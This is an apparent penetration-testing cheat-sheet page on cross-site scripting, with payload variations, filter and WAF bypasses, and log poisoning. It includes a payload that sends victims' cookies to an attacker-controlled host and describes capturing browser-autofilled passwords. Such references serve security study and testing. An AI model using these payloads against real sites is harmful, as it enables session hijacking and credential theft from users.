Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • XSSable Locations
  • In the Document
  • Log Poisoning
  • Payload Variations
  • Stealing Things
  • Catch and Store Stolen Credentials
  • Cookies
  • Passwords
  • Filter Bypassing
  • Multiple Fields Method
  • Global Variables
  • Nested Payloads
  • Various Payloads

Was this helpful?

  1. Web App Hacking
  2. User Attacks

XSS/Cross Site Scripting

PreviousSession FixationNextCSS Injection

Last updated 3 years ago

Was this helpful?

XSSable Locations

In the Document

XSS can occur as a result of the following things:

  • The attacker can inject certain HTML tags

    • The simplest example is the <script> tag, but others can also work, such as <img src=x onerror=alert(1)>

  • The attacker can inject text in between certain tags or in certain fields

    • The same as above, but instead of injecting the tag, the tag already exists, and the attacker is able to write text in between the tag.

    • For example, there's a <img src=ATTACKER_INPUT_HERE> tag, and the attacker injects x onerror=alert(1)

  • The attacker can inject a malicious URL.

    • For example, <a href="javascript:alert(1)">click me</a>

Log Poisoning

You can try to sneak XSS payloads into logs. If the application that views the logs treats input insecurely, then it might result in XSS.

If the User-Agent header is logged, then putting the payload there would be an easy way to get javascript into the log file.

Payload Variations

Here are some common ones:

# Normal script tags
<script>alert(1)</script>

# HTML attributes, like img onerror
<iMg src=x onerror=prompt(1337);>

# XSS in between tags
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />     ← injecting ‘);alert(‘xss 

# Iframe xss, bypasses some sanitizers if “srcdoc” attribute is allowed
<iframe srcdoc="&lt;img src=x:x onerror=alert(1)&gt;"></iframe>

Stealing Things

Catch and Store Stolen Credentials

Cookies

If cookies are configured to be accessible via Javascript (no HttpOnly flag), then you can just fetch the cookie and do a GET request to a site you control:

<iMg src=x oNerRor=this.src='https://mysite.com/somepage?creds='+document.cookie>

Passwords

TODO: Link phishing page under Social Engineering or Web App Hacking?

You can capture a user's password. For example:

  1. You can display a login page to the user and capture their password if they choose to enter it.

  2. If the victim’s browser has remember password enabled, you can put a login form on the page, wait 1 second while the browser pastes their password there and then capture that.

Filter Bypassing

Multiple Fields Method

Works for Chrome XSS Auditor and many other filters. The bypass works by having two query parameters that you can inject into. When you combine the two injections, then a valid javascript payload is formed, and the XSS auditor doesn't detect it.

For example, the first parameter:

<script>alert("hi

The second parameter:

");</script>

Global Variables

This works for weak (default) ModSecurity rulesets.

Simple example:

<scirpt>self["alert"]("foo");</script>

Nested Payloads

If malicious input is stripped only once, then try nested payloads:

<scri<script>pt>alert(1)</scri</script>pt>

Various Payloads

Here are some more interesting payloads:

# Iframe XSS
<iframe srcdoc="&lt;img src=x:x onerror=alert(1)&gt;"></iframe>

# Against server-side parsers, this was an XSS in Google
<noscript><p title="</noscript><img src=x onerror=alert(1)>"> 

# CRLF injection to bypass javascript: being blacklisted
java%0d%0ascript%0d%0a:alert(0)

# incase svg onload= is filtered, the %0d acts as a seperator and can sometimes confuse wafs.
# %0a %0c %09 %00 are also common separators to use here.
<svg%0donload=prompt(1)>

# Uncommon XSS vector
<input onfocus=alert(0) autofocus>

# The use of \\ will break out of a quote inside a script tag
\\"-alert(0);//

# onmouseenter is like onmouseover, and confirm is like prompt
"onmouseenter=confirm(1)>

If you need a site for catching cookies, then should be useful.

More bypasses:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection
https://requestcatcher.com/
https://www.youtube.com/watch?v=8GwVBpTgR2c
https://materials.rangeforce.com/tutorial/2019/10/23/ModSecurity-Filter-Evasion/
LogoGitHub - s0md3v/AwesomeXSS: Awesome XSS stuffGitHub